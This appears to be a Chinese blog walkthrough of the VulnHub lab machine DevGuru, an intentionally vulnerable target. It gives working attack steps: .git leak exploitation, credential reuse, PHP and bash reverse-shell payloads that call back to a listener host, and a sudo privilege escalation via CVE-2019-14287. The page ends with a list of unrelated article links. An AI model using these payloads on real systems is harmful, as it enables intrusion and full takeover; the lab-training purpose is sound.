当前位置: 首页 > news >正文

vulnhub系列:devguru

vulnhub系列:devguru

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

nmap 192.168.23.0/24

nmap扫描网段

nmap扫描端口,开放端口:22、80、8585

nmap 192.168.23.147 -p- -sV -Pn -O

nmap扫描端口

访问80端口

首页

dirb目录扫描,存在 git 源码、

dirb http://192.168.23.147/

目录扫描结果

拼接发现数据库登录页面

mysql登录页面

发现登录页面

登录页面

拼接/.git/config,发现8585端口的路径

git下config

拼接,是8585端口的页面

发现8585端口登录页面

拼接/.git/description,提示通过编辑 description 库来命名数据库

git下description

找不到其他东西,扫一下 8585 端口的目录

搜索框

搜索框

也没扫出什么东西,看一下80端口的 git 源码泄露,Githack 下载查看

githack下载源码

源码中发现 mysql 账号密码

mysql账号密码

成功登录数据库

登录数据库

发现 frank 用户,但是密码破解不出来,直接添加一个用户

发现frank用户

添加jqj用户

设置权限

设置组

添加用户后无法登录,john 解码发现密码为 bcrypt 加密发现密码,设置密码时需要选择 encrypt ,修改后成功登录

登录80后台

二、getshell

在 cms -> pages 可以写入语句,这里我在 about 中写入语句

function onStart(){$s=fsockopen("192.168.195.130",7777);$proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);
}

写入反弹shell语句

kali监听4444端口,然后访问页面的about路径

访问about

成功反弹shell

成功反弹shell

三、提权

使用python提升交互性

python3 -c "import pty;pty.spawn('/bin/bash')"

image-20240813190145545

尝试提权失败,/home 目录下有一个 frank 目录,也没有权限进入

/var/backups 下发现 app.ini.pak,查看内容

image-20240813190806441

得到 gitea 账号密码

gitea:UfFPTF8C8jjxVF2m

返回 adminer.php 页面,登录

image-20240813191013424

user 表下发现 frank 用户,密码 bcrypt 加密

image-20240813191202176

将密码修改为同样 bcrypt 加密的,123456

https://www.bejson.com/encrypt/bcrpyt_encode/$2a$10$vVQiseY5ZaYAwCcbgXJRpOxOhqXtXfN2SvsjW3vG3AXWw3R.LESIe

image-20240813191718376

将密码修改

image-20240813192023609

访问 8585端口的 /user/login 进行登录

image-20240813192127390

image-20240813192138443

登录后点击

image-20240813192527638

image-20240813192610069

在其中写入反弹 shell 语句

bash -c "exec bash -i >& /dev/tcp/192.168.23.133/4444 0>&1"

image-20240813192824608

下方点击保存

image-20240813192841923

kali 开启监听

nc -lvnp 4444

image-20240813193055175

返回前几个路径,随便修改一个文件,保存后即可反弹shell

image-20240813193131293

在 /home/frank 下发现第一个 flag 文件

image-20240813193336959

查看当前权限

sudo -l

image-20240813193235528

发现 sqlite3 命令能执行 root 权限,执行命令

sudo sqlite3 /dev/null '.shell /bin/sh'

提权失败,百度搜了一下,是由于 sudo 版本问题导致,查看 sudo 版本

sudo -V

image-20240813193827644

又查了一下,sudo 版本低于 1.8.27,存在 CVE-2019-14287 漏洞,执行命令,提权成功

sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh'

image-20240813194035788

在 /root 下发现第二个 flag

image-20240813194120521

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • [SWPUCTF 2021 新生赛]PseudoProtocols(构造伪协议)
  • C# 计算两两坐标之间的距离(SIMD加速)
  • 常用的数据结构有哪些?
  • Docker 部署RocketMQ
  • 若依框架将Mybatis改成MybatisPlus
  • RabbitMQ面试题汇总
  • 【数学建模】介绍论文书写格式
  • YOLOv10实时端到端目标检测
  • 智慧楼宇公厕系统小程序,提高卫生间管理使用效率
  • CDP问卷填报流程-百胜企业管理咨询
  • 8.9 python管理mysql
  • Go语言 Defer(延迟)
  • Flutter-->AAPT: error: resource android:attr/lStar not found.
  • 安卓中Room持久化库的使用
  • 哈希 | Java | (hot100) 力扣 49
  • ES6指北【2】—— 箭头函数
  • 【108天】Java——《Head First Java》笔记(第1-4章)
  • 【腾讯Bugly干货分享】从0到1打造直播 App
  • 2018天猫双11|这就是阿里云!不止有新技术,更有温暖的社会力量
  • CSS中外联样式表代表的含义
  • interface和setter,getter
  • JS基础篇--通过JS生成由字母与数字组合的随机字符串
  • ng6--错误信息小结(持续更新)
  • php ci框架整合银盛支付
  • V4L2视频输入框架概述
  • XForms - 更强大的Form
  • 基于web的全景—— Pannellum小试
  • 开年巨制!千人千面回放技术让你“看到”Flutter用户侧问题
  • 理解IaaS, PaaS, SaaS等云模型 (Cloud Models)
  • 排序算法学习笔记
  • 配置 PM2 实现代码自动发布
  • 前端技术周刊 2019-02-11 Serverless
  • 如何在GitHub上创建个人博客
  • 它承受着该等级不该有的简单, leetcode 564 寻找最近的回文数
  • 项目实战-Api的解决方案
  • 用element的upload组件实现多图片上传和压缩
  • UI设计初学者应该如何入门?
  • 关于Kubernetes Dashboard漏洞CVE-2018-18264的修复公告
  • 国内开源镜像站点
  • ​LeetCode解法汇总2670. 找出不同元素数目差数组
  • #Linux(make工具和makefile文件以及makefile语法)
  • #我与Java虚拟机的故事#连载07:我放弃了对JVM的进一步学习
  • (+4)2.2UML建模图
  • (9)YOLO-Pose:使用对象关键点相似性损失增强多人姿态估计的增强版YOLO
  • (c语言)strcpy函数用法
  • (MonoGame从入门到放弃-1) MonoGame环境搭建
  • (补充):java各种进制、原码、反码、补码和文本、图像、音频在计算机中的存储方式
  • (不用互三)AI绘画:科技赋能艺术的崭新时代
  • (个人笔记质量不佳)SQL 左连接、右连接、内连接的区别
  • (三)elasticsearch 源码之启动流程分析
  • (三分钟了解debug)SLAM研究方向-Debug总结
  • (十三)Maven插件解析运行机制
  • (一)基于IDEA的JAVA基础10
  • (转)linux下的时间函数使用
  • (转)shell调试方法